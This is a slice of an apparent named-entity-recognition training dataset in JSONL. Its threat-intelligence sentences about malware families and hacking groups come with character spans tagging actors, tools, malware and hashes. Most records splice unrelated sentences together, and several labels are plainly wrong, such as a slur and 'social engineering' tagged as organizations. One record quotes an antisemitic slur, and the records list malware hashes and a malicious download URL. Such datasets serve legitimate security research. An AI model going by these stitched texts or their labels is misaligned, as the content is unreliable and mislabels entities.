In one particular forum post , Hack520 mentions that he was previously jailed for a period of 10 months in a blog post dated May 31 , 2009 .", "spans": {"MALWARE: RuMMS": [[39, 44], [83, 88]], "SYSTEM: Google Play": [[92, 103]], "ORGANIZATION: social engineering": [[161, 179]], "TOOL: remote administration tools": [[332, 359]], "TOOL: RATs": [[362, 366]], "ORGANIZATION: oil and gas": [[491, 502]], "TOOL: SFX archive": [[553, 564]], "FILEPATH: 8957.cmd": [[657, 665]], "FILEPATH: 28847": [[674, 679]], "ORGANIZATION: Hack520": [[715, 722]]}, "info": {"id": "cyberner_stix_train_005123", "source": "cyberner_stix_train"}} {"text": "But before we go into the details of what the latest version of Rotexy can do and why it ’ s distinctive , we would like to give a summary of the path the Trojan has taken since 2014 up to the present day . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee . Lazarus group could have been active since late 2016 , was used in a recent campaign targeting financial institutions using watering hole attacks .", "spans": {"MALWARE: Rotexy": [[64, 70]], "TOOL: Word document": [[227, 240]], "MALWARE: manual.doc": [[241, 251]], "THREAT_ACTOR: Honeybee": [[321, 329]], "THREAT_ACTOR: Lazarus group": [[332, 345]], "ORGANIZATION: financial institutions": [[427, 449]]}, "info": {"id": "cyberner_stix_train_005124", "source": "cyberner_stix_train"}} {"text": "The extent of information that these kinds of threats can steal is also significant , as it lets attackers virtually take over a compromised device . While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide . While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019 , we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set . 
and % HiddenKey% as part of its persistence via the Windows registry.[6 ] OSX / Shlayer has used the mktemp utility to make random and unique filenames for payloads , such as export tmpDir=\"$(mktemp -d /tmp / XXXXXXXXXXXX ) \" or mktemp -t Installer .", "spans": {"THREAT_ACTOR: While Silence": [[150, 163]], "ORGANIZATION: banks": [[196, 201]], "ORGANIZATION: Group-IB": [[204, 212]], "THREAT_ACTOR: FIN7": [[511, 515]], "TOOL: OSX / Shlayer": [[606, 619]]}, "info": {"id": "cyberner_stix_train_005125", "source": "cyberner_stix_train"}} {"text": "5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c APT10 actors gained initial access to the Visma network around August 17 , 2018 . HomamDownloader was discovered to be delivered by Tick via a spearphishing email .", "spans": {"SYSTEM: Adobe Flash Player": [[65, 83], [171, 189]], "THREAT_ACTOR: APT10": [[276, 281]], "TOOL: Visma network": [[318, 331]], "MALWARE: HomamDownloader": [[358, 373]], "THREAT_ACTOR: Tick": [[408, 412]], "TOOL: email": [[433, 438]]}, "info": {"id": "cyberner_stix_train_005126", "source": "cyberner_stix_train"}} {"text": "Overall , Cerberus has a pretty common feature list and although the malware seems to have been written from scratch there does not seem to be any innovative functionality at this time . Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . 
In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"MALWARE: Cerberus": [[10, 18]], "MALWARE: Backdoor": [[187, 195]], "THREAT_ACTOR: REDBALDKNIGHT": [[311, 324]], "FILEPATH: decoy documents": [[405, 420]]}, "info": {"id": "cyberner_stix_train_005127", "source": "cyberner_stix_train"}} {"text": "] today PHA Family Highlights : Zen and its cousins January 11 , 2019 Google Play Protect detects Potentially Harmful Applications ( PHAs ) which Google Play Protect defines as any mobile app that poses a potential security risk to users or to user data—commonly referred to as \" malware . Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida . Between November 26, 2015, and December 1, 2015, known and suspected China based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . This activity suggested exploitation of CVE-2021 - 26858 .", "spans": {"MALWARE: Zen": [[32, 35]], "SYSTEM: Google Play Protect": [[70, 89], [146, 165]], "VULNERABILITY: CVE-2021 - 26858": [[763, 779]]}, "info": {"id": "cyberner_stix_train_005128", "source": "cyberner_stix_train"}} {"text": "For this purpose , these actors often use tools such as Technitium MAC Address Changer . APT35 typically targets U.S. 
and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": {"THREAT_ACTOR: actors": [[25, 31]], "TOOL: Technitium MAC Address Changer": [[56, 86]], "THREAT_ACTOR: APT35": [[89, 94]], "ORGANIZATION: military": [[141, 149]], "ORGANIZATION: diplomatic": [[152, 162]], "ORGANIZATION: government personnel": [[167, 187]], "ORGANIZATION: organizations": [[190, 203]], "ORGANIZATION: media": [[211, 216]], "ORGANIZATION: energy": [[219, 225]], "ORGANIZATION: defense industrial base": [[230, 253]], "ORGANIZATION: DIB": [[256, 259]], "ORGANIZATION: engineering": [[268, 279]], "ORGANIZATION: business services": [[282, 299]], "ORGANIZATION: telecommunications sectors": [[304, 330]]}, "info": {"id": "cyberner_stix_train_005129", "source": "cyberner_stix_train"}} {"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors . WildFire correctly classifies NetTraveler as malicious .", "spans": {"THREAT_ACTOR: groups": [[5, 11]], "TOOL: PLATINUM backdoors": [[92, 110]], "ORGANIZATION: WildFire": [[113, 121]], "MALWARE: NetTraveler": [[143, 154]]}, "info": {"id": "cyberner_stix_train_005130", "source": "cyberner_stix_train"}} {"text": "The CIA's Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": {"THREAT_ACTOR: CIA's": [[4, 9]]}, "info": {"id": "cyberner_stix_train_005131", "source": "cyberner_stix_train"}} {"text": "The main DLL is called \" Reznov.DLL . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . 
We expect APT33 activity will continue to cover a broad scope of targeted entities , and may spread into other regions and sectors as Iranian interests dictate .", "spans": {"MALWARE: China Chopper": [[38, 51]], "THREAT_ACTOR: attackers": [[74, 83]]}, "info": {"id": "cyberner_stix_train_005132", "source": "cyberner_stix_train"}} {"text": "Here ’ s another example of such an attack hitting Windows users : Going back to the Android Package ( APK ) file was attached to the e-mail , this is pushing an Android application named “ WUC ’ s Conference.apk ” . PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": {"SYSTEM: Windows": [[51, 58]], "SYSTEM: Android Package": [[85, 100]], "MALWARE: WUC ’ s Conference.apk": [[190, 212]], "THREAT_ACTOR: PROMETHIUM": [[217, 227]], "THREAT_ACTOR: NEODYMIUM": [[232, 241]], "VULNERABILITY: CVE-2016-4117": [[267, 280]], "THREAT_ACTOR: attackers": [[431, 440]], "MALWARE: Naikon proxies": [[448, 462]]}, "info": {"id": "cyberner_stix_train_005133", "source": "cyberner_stix_train"}} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "ORGANIZATION: military officials": [[63, 81]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]], "MALWARE: DLL": [[186, 189]], "VULNERABILITY: CVE-2015-2546": [[254, 267]], "SYSTEM: Windows": [[277, 284]], "MALWARE: Word": [[341, 345]]}, "info": {"id": "cyberner_stix_train_005134", "source": "cyberner_stix_train"}} {"text": "China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon .", "spans": {"MALWARE: China Chopper": [[0, 13]], "FILEPATH: CONFUCIUS_B": [[138, 149]], "TOOL: Right-To-Left-Override": [[213, 235]], "TOOL: RTLO": [[238, 242]]}, "info": {"id": "cyberner_stix_train_005135", "source": "cyberner_stix_train"}} {"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology .", "spans": {"MALWARE: attachment": [[35, 45]], "TOOL: NetTraveler": [[79, 90]], "MALWARE: DLL side-loading": [[99, 115]], "THREAT_ACTOR: Anchor Panda": [[185, 197]], "ORGANIZATION: naval": [[321, 326]], "ORGANIZATION: aerospace technology": [[331, 351]]}, "info": {"id": "cyberner_stix_train_005136", "source": "cyberner_stix_train"}} {"text": "During the trojan registration stage , the trojan exfiltrates private information such as the phone 's model , IMEI , phone number and country . 
The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": {"MALWARE: archive": [[159, 166]], "VULNERABILITY: vulnerability": [[227, 240]], "THREAT_ACTOR: APT37": [[290, 295]]}, "info": {"id": "cyberner_stix_train_005137", "source": "cyberner_stix_train"}} {"text": "The method is a well-known trick used by penetration testers that was automated and generalized by FinFisher The procedure starts by enumerating the KnownDlls object directory and then scanning for section objects of the cached system DLLs . COBALT GYPSY has used spearphishing to target telecommunications , government , defense , oil , and financial services organizations based in or affiliated with the MENA region , identifying individual victims through social media sites . We came across multiple variations of this DLL containing different parent process names , possibly targeted specifically to the victim’s environment . 
then the data decoded with Base64 and sent to C2 server IP using POST request to the subdirectory .", "spans": {"MALWARE: FinFisher": [[99, 108]], "THREAT_ACTOR: COBALT GYPSY": [[242, 254]], "ORGANIZATION: telecommunications": [[288, 306]], "ORGANIZATION: government": [[309, 319]], "ORGANIZATION: defense": [[322, 329]], "ORGANIZATION: oil": [[332, 335]], "ORGANIZATION: financial services organizations": [[342, 374]], "ORGANIZATION: individual victims": [[433, 451]], "ORGANIZATION: social media": [[460, 472]], "TOOL: DLL": [[524, 527]], "SYSTEM: C2 server IP": [[679, 691]], "TOOL: POST request": [[698, 710]]}, "info": {"id": "cyberner_stix_train_005138", "source": "cyberner_stix_train"}} {"text": "89eecd91dff4bf42bebbf3aa85aa512ddf661d3e9de4c91196c98f4fc325a018 9edee3f3d539e3ade61ac2956a6900d93ba3b535b6a76b3a9ee81e2251e25c61 0e48e5dbc3a60910c1460b382d28e087a580f38f57d3f82d4564309346069bd1 c113cdd2a5e164dcba157fc4e6026495a1cfbcb0b1a8bf3e38e7eddbb316e01f This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 . Rancor : CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A . These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": {"THREAT_ACTOR: Naikon": [[265, 271], [344, 350]], "THREAT_ACTOR: Rancor": [[472, 478]], "FILEPATH: CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A": [[481, 545]], "MALWARE: COSMICENERGY": [[599, 611]]}, "info": {"id": "cyberner_stix_train_005139", "source": "cyberner_stix_train"}} {"text": "Although it 's not pretty simple to hack Android devices and gadgets , sometimes you just get lucky to find a backdoor access . 
BRONZE UNION has consistently demonstrated the capability to conduct successful large-scale intrusions against high-profile networks and systems . Outlaw : fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 . What prompted the data scientist Bullock to reach out were gobs of anti - Semitic diatribes from Harrison , who had taken to labeling Biderman and others “ greedy Jew bastards . ”", "spans": {"SYSTEM: Android": [[41, 48]], "THREAT_ACTOR: Outlaw": [[275, 281]], "FILEPATH: fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a": [[284, 348]], "TOOL: Cryptocurrency miner": [[349, 369]], "MALWARE: Coinminer.Linux.MALXMR.SMDSL32": [[370, 400]], "ORGANIZATION: Bullock": [[436, 443]], "THREAT_ACTOR: Harrison": [[500, 508]], "ORGANIZATION: Biderman": [[537, 545]], "ORGANIZATION: greedy Jew bastards": [[559, 578]]}, "info": {"id": "cyberner_stix_train_005140", "source": "cyberner_stix_train"}} {"text": "Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "VULNERABILITY: Java zero-day exploit": [[43, 64]], "MALWARE: Poison Ivy malware": [[266, 284]]}, "info": {"id": "cyberner_stix_train_005141", "source": "cyberner_stix_train"}} {"text": "Distribution Cybercriminals made use of some exceptionally sophisticated methods to infect mobile devices . March by security researchers from Kaspersky Labs . Unlike previous ShadowPad variants documented in our white paper on the arsenal of the Winnti Group , this launcher is not obfuscated using VMProtect . 
Victims of the campaign , which researchers named Out to Sea PDF , include diplomatic organizations , technology companies , and medical organizations in Israel , Tunisia , and the UAE .", "spans": {"ORGANIZATION: Kaspersky Labs": [[143, 157]], "MALWARE: ShadowPad": [[176, 185]], "THREAT_ACTOR: Winnti Group": [[247, 259]], "TOOL: VMProtect": [[300, 309]], "ORGANIZATION: diplomatic organizations": [[387, 411]], "ORGANIZATION: technology companies": [[414, 434]], "ORGANIZATION: medical organizations": [[441, 462]]}, "info": {"id": "cyberner_stix_train_005142", "source": "cyberner_stix_train"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated Cyber Espionage toolkits we have ever analysed .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "MALWARE: Lamberts": [[242, 250]], "MALWARE: Regin": [[286, 291]], "MALWARE: ProjectSauron": [[294, 307]], "MALWARE: Equation": [[310, 318]], "MALWARE: Duqu2": [[323, 328]]}, "info": {"id": "cyberner_stix_train_005143", "source": "cyberner_stix_train"}} {"text": "After inspecting the njRAT builder kit it was determined that this individual customized the existing njRAT builder kit to bypass security products .", "spans": {"TOOL: njRAT builder kit": [[21, 38], [102, 119]]}, "info": {"id": "cyberner_stix_train_005144", "source": "cyberner_stix_train"}} {"text": "That post included download links for a slew of NSA hacking tools and exploits , many of which could be used to break into hardware firewall appliances , and in turn , corporate or government networks . 
Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": {"ORGANIZATION: NSA": [[48, 51]], "THREAT_ACTOR: Barium": [[203, 209]], "ORGANIZATION: Microsoft customers": [[223, 242]]}, "info": {"id": "cyberner_stix_train_005145", "source": "cyberner_stix_train"}} {"text": "The group is reported to have previously attacked government institutions , parliaments , senates , diplomatic functions , and even Olympic and other sports bodies .", "spans": {}, "info": {"id": "cyberner_stix_train_005146", "source": "cyberner_stix_train"}} {"text": "405655be03df45881aa88b55603bef1d .", "spans": {"FILEPATH: 405655be03df45881aa88b55603bef1d": [[0, 32]]}, "info": {"id": "cyberner_stix_train_005147", "source": "cyberner_stix_train"}} {"text": "These emails were designed to trick recipients into supposedly changing their email passwords on a fake webmail domain .", "spans": {"TOOL: emails": [[6, 12]], "TOOL: email": [[78, 83]]}, "info": {"id": "cyberner_stix_train_005148", "source": "cyberner_stix_train"}} {"text": "SHA256 : 8ab1712ce9ca2d7952ab763d8a4872aa6a278c3f60dc13e0aebe59f50e6e30f6 The TrickMo Factor The TrickBot Trojan was one of the most active banking malware strains in the cybercrime arena in 2019 . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions . 
Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly .", "spans": {"MALWARE: TrickMo": [[78, 85]], "MALWARE: TrickBot Trojan": [[97, 112]], "THREAT_ACTOR: APT38": [[211, 216]], "ORGANIZATION: financial institutions": [[277, 299]]}, "info": {"id": "cyberner_stix_train_005149", "source": "cyberner_stix_train"}} {"text": "When malicious attachments are used , they may either be designed to exploit a vulnerability in a popular software assumed to be installed on the victim ’s machine , such as Microsoft Word or Adobe Reader , or the attachment itself may have its icon and filename obfuscated in such a way that the file does not appear to be an executable .", "spans": {"ORGANIZATION: Microsoft": [[174, 183]], "TOOL: Word": [[184, 188]], "TOOL: Adobe Reader": [[192, 204]]}, "info": {"id": "cyberner_stix_train_005150", "source": "cyberner_stix_train"}} {"text": "The Awen webshell deployed in the exploitation of this SharePoint vulnerability had a SHA256 hash of 5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21 .", "spans": {"TOOL: Awen": [[4, 8]], "TOOL: SharePoint": [[55, 65]], "FILEPATH: 5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21": [[101, 165]]}, "info": {"id": "cyberner_stix_train_005151", "source": "cyberner_stix_train"}} {"text": "It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target . We collected two sets of Clayslide samples that appear to be created during the OilRig actor 's development phase of their attack lifecycle . Exploring it , it is possible to see several files inside of it , as well as the 6323 file . 
However , if the adversary exploits a ZeroDay vulnerability and develops a new virus to infiltrate the system , traditional signaturebased network security tools will fail to defend against the attack .", "spans": {"TOOL: Clayslide samples": [[151, 168]], "THREAT_ACTOR: OilRig actor": [[206, 218]], "FILEPATH: 6323": [[348, 352]], "THREAT_ACTOR: adversary": [[376, 385]], "VULNERABILITY: ZeroDay vulnerability": [[397, 418]], "MALWARE: virus": [[438, 443]], "TOOL: traditional signaturebased network security tools": [[471, 520]]}, "info": {"id": "cyberner_stix_train_005152", "source": "cyberner_stix_train"}} {"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on .", "spans": {"MALWARE: malware": [[15, 22]], "ORGANIZATION: Pension Service": [[186, 201]], "ORGANIZATION: government": [[249, 259]], "ORGANIZATION: government agencies": [[264, 283]], "ORGANIZATION: local governments": [[286, 303]], "ORGANIZATION: public interest groups": [[306, 328]], "ORGANIZATION: universities": [[331, 343]], "ORGANIZATION: banks": [[346, 351]], "ORGANIZATION: financial services": [[354, 372]], "ORGANIZATION: energy": [[375, 381]]}, "info": {"id": "cyberner_stix_train_005154", "source": "cyberner_stix_train"}} {"text": "Quasar version 1.3.0.0 changed the encryption key generation , and stopped saving the password in the sample .", "spans": {"MALWARE: Quasar version 1.3.0.0": [[0, 22]]}, "info": {"id": "cyberner_stix_train_005155", "source": "cyberner_stix_train"}} {"text": "In some instances , the malware may have been present on victims' networks for a significant period .", "spans": {}, "info": {"id": "cyberner_stix_train_005156", "source": 
"cyberner_stix_train"}} {"text": "In our case , the administrator phone number belongs to a mobile network in Australia . Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors . The data transmitted are XOR encoded . The first 6 Variables numbered lines were nt used anywhere in the code .", "spans": {"THREAT_ACTOR: group": [[124, 129]], "ORGANIZATION: Governments": [[208, 219]], "ORGANIZATION: Academy": [[222, 229]], "ORGANIZATION: Crypto-Currency": [[232, 247]], "ORGANIZATION: Telecommunications": [[250, 268]], "ORGANIZATION: Oil sectors": [[277, 288]]}, "info": {"id": "cyberner_stix_train_005157", "source": "cyberner_stix_train"}} {"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails . The first sample being captured was in April 2018 and since that we observed a lot more related ones .", "spans": {}, "info": {"id": "cyberner_stix_train_005158", "source": "cyberner_stix_train"}} {"text": "July 21 Analysis of the RCSAndroid spying tool revealed that Hacking Team can listen to calls and roots devices to get in . CopyKittens often uses the trial version of Cobalt Strike , a publicly available commercial software for \" Adversary Simulations and Red Team Operations \" . Hex-Rays kernel doesn’t optimize some functions in MMAT_GLBOPT2 if it judges the optimization within the level is not required . 
To get in , the attacker used spear phishing emails with a self - extracting archive attachment pretending to be a voicemail .", "spans": {"MALWARE: RCSAndroid": [[24, 34]], "THREAT_ACTOR: CopyKittens": [[124, 135]], "TOOL: Cobalt Strike": [[168, 181]], "TOOL: Hex-Rays": [[281, 289]], "TOOL: MMAT_GLBOPT2": [[332, 344]]}, "info": {"id": "cyberner_stix_train_005159", "source": "cyberner_stix_train"}} {"text": "Of the four , KeyBase stands out due to its rapid rise in popularity , with a peak deployment of 160 samples per month and usage by 46 separate SilverTerrier actors , followed by a fairly rapid decline . The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups .", "spans": {"TOOL: KeyBase": [[14, 21]], "THREAT_ACTOR: SilverTerrier actors": [[144, 164]], "ORGANIZATION: defense contractors": [[266, 285]], "ORGANIZATION: colleges": [[288, 296]], "ORGANIZATION: universities": [[301, 313]], "ORGANIZATION: law firms": [[316, 325]], "ORGANIZATION: political organizations": [[332, 355]], "ORGANIZATION: minority ethnic groups": [[401, 423]]}, "info": {"id": "cyberner_stix_train_005160", "source": "cyberner_stix_train"}} {"text": "After the VM code has checked again the user environment , it proceeds to extract and execute the final un-obfuscated payload sample directly into winlogon.exe ( alternatively , into explorer.exe ) process . FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities . If successful , every time the system loads wininet.dll , the entry point of the subsequently dropped backdoor DLL will be executed before the original wininet entry point . 
They have employed many unique capabilities , including gaining initial access through a software supply chain vulnerability .", "spans": {"ORGANIZATION: FireEye": [[208, 215]], "THREAT_ACTOR: Flying Kitten": [[286, 299], [365, 378]], "ORGANIZATION: aviation firms": [[322, 336]], "FILEPATH: wininet.dll": [[482, 493]], "TOOL: DLL": [[549, 552]], "THREAT_ACTOR: employed many unique capabilities , including gaining initial access": [[622, 690]], "VULNERABILITY: software supply chain vulnerability": [[701, 736]]}, "info": {"id": "cyberner_stix_train_005161", "source": "cyberner_stix_train"}} {"text": "CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . However , Kaspersky Security Network (KSN) records also contain links that victims clicked from the Outlook web client outlook.live.com” as well as attachments arriving through the Outlook desktop application .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: COBALT GYPSY": [[30, 42]], "ORGANIZATION: social engineering": [[125, 143]], "ORGANIZATION: Kaspersky": [[156, 165]], "TOOL: Outlook": [[246, 253], [327, 334]], "FILEPATH: outlook.live.com”": [[265, 282]]}, "info": {"id": "cyberner_stix_train_005162", "source": "cyberner_stix_train"}} {"text": "Iterating once again over the 171 samples and scraping out the HTTP POST requests , I ended up with the below set of domains :", "spans": {}, "info": {"id": "cyberner_stix_train_005163", "source": "cyberner_stix_train"}} {"text": "First off , the Trojan registers in the administration panel and receives the information it needs to operate from the C & C ( the SMS interception templates and the text that will be displayed on HTML pages ) : Rotexy intercepts all incoming SMSs and processes them according to the templates it received from the C & C . 
This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": {"MALWARE: Rotexy": [[212, 218]], "MALWARE: bait document": [[328, 341]], "MALWARE: Word document": [[391, 404]], "VULNERABILITY: CVE-2012-0158": [[425, 438]], "THREAT_ACTOR: Lazarus Group": [[614, 627]], "MALWARE: WannaCry": [[648, 656]], "ORGANIZATION: Microsoft customers": [[701, 720]]}, "info": {"id": "cyberner_stix_train_005164", "source": "cyberner_stix_train"}} {"text": "fields [ ] . Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China . During C0018 , the threat actors opened a variety of ports , including ports 28035 , 32467 , 41578 , and 46892 , to establish RDP connections.[9 ]", "spans": {"TOOL: Bookworm": [[13, 21]], "THREAT_ACTOR: BlackOasis": [[164, 174]], "THREAT_ACTOR: threat actors": [[309, 322]]}, "info": {"id": "cyberner_stix_train_005165", "source": "cyberner_stix_train"}} {"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . 
Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart .", "spans": {"MALWARE: Careto": [[59, 65]], "FILEPATH: link file": [[144, 153]], "FILEPATH: AutoHotkeyU32.exe": [[180, 197]]}, "info": {"id": "cyberner_stix_train_005166", "source": "cyberner_stix_train"}} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Turla is a notorious group that has been targeting diplomats .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "THREAT_ACTOR: Turla": [[199, 204]], "ORGANIZATION: diplomats": [[250, 259]]}, "info": {"id": "cyberner_stix_train_005167", "source": "cyberner_stix_train"}} {"text": "The Trojan gets the list of bank phone numbers from its C & C server . One big unknown was the infection vector for Turla ( aka Snake or Uroburos ) . Command line shell for remote administration . 
These groups can steal information and argue that they are practicing free speech , but more often than not , these groups will employ a DDoS Distributed Denial of Service attack to overload a website with too much traffic and cause it to crash .", "spans": {"THREAT_ACTOR: Snake": [[128, 133]], "THREAT_ACTOR: Uroburos": [[137, 145]], "TOOL: Command line shell": [[150, 168]], "THREAT_ACTOR: groups": [[203, 209]]}, "info": {"id": "cyberner_stix_train_005168", "source": "cyberner_stix_train"}} {"text": "Even such targets however appear to be consistent with the overarching theme , given the drug trade ’s relevance to security policy .", "spans": {}, "info": {"id": "cyberner_stix_train_005169", "source": "cyberner_stix_train"}} {"text": "Thus , it is not surprising to see them engage in intrusions against the same victim , even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations .", "spans": {}, "info": {"id": "cyberner_stix_train_005170", "source": "cyberner_stix_train"}} {"text": "The panels also contain Thai JavaScript comments and the domain names also contain references to Thai food , a tactic commonly employed to entice users to click/visit these C2 panels without much disruption . BARIUM begins its attacks by cultivating relationships with potential victims—particularly those working in Business Development or Human Resources—on various social media platforms . This technique also allows the attackers to cover their tracks , as having the C&C server in the victims ’ corporate networks means very little C&C traffic leaves them . 
The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": {"ORGANIZATION: social media": [[368, 380]], "TOOL: C&C": [[472, 475], [537, 540]], "MALWARE: FakeSG": [[596, 602]], "SYSTEM: hacked WordPress websites": [[620, 645]]}, "info": {"id": "cyberner_stix_train_005171", "source": "cyberner_stix_train"}} {"text": "In this case , a URL used to download the PowerShell component shared a naming convention found in the IBM report , http://69.87.223.26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples .", "spans": {"TOOL: URL": [[17, 20]], "TOOL: PowerShell": [[42, 52]], "ORGANIZATION: IBM": [[103, 106]], "DOMAIN: http://69.87.223.26:8080/eiloShaegae1": [[116, 153]]}, "info": {"id": "cyberner_stix_train_005172", "source": "cyberner_stix_train"}} {"text": "In July 2017 , INDRIK SPIDER joined the movement of targeted ransomware with BitPaymer . Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) .", "spans": {"TOOL: BitPaymer": [[77, 86]]}, "info": {"id": "cyberner_stix_train_005173", "source": "cyberner_stix_train"}} {"text": "Sending text “ call on ” will activate the USSD payment confirmation service . We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region . It is hard for the targets to identify legitimate and malicious traffic to cloud provider infrastructure . 
Mandiant has observed UNC2970 , APT43 , and UNC4899 all utilize similar infrastructure .", "spans": {"THREAT_ACTOR: APT34": [[89, 94]]}, "info": {"id": "cyberner_stix_train_005174", "source": "cyberner_stix_train"}} {"text": "OnionDuke first caught our attention because it was being spread via a malicious Tor exit node .", "spans": {"MALWARE: OnionDuke": [[0, 9]], "TOOL: Tor": [[81, 84]]}, "info": {"id": "cyberner_stix_train_005175", "source": "cyberner_stix_train"}} {"text": "Later stages of the intrusions rely upon Winnti for persistent access .", "spans": {"MALWARE: Winnti": [[41, 47]]}, "info": {"id": "cyberner_stix_train_005176", "source": "cyberner_stix_train"}} {"text": "Users rarely check the full URL associated with short links , so threat groups can use URL-shortening services to effectively hide malicious URLs .", "spans": {}, "info": {"id": "cyberner_stix_train_005177", "source": "cyberner_stix_train"}} {"text": "The lure documents analyzed by Cybereason in this attack concentrate on the following themes :", "spans": {"ORGANIZATION: Cybereason": [[31, 41]]}, "info": {"id": "cyberner_stix_train_005178", "source": "cyberner_stix_train"}} {"text": "What ’ s more interesting , and much less common , is the inclusion of the com.xiaomi.smarthome.receive_alarm intent filter . We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . 
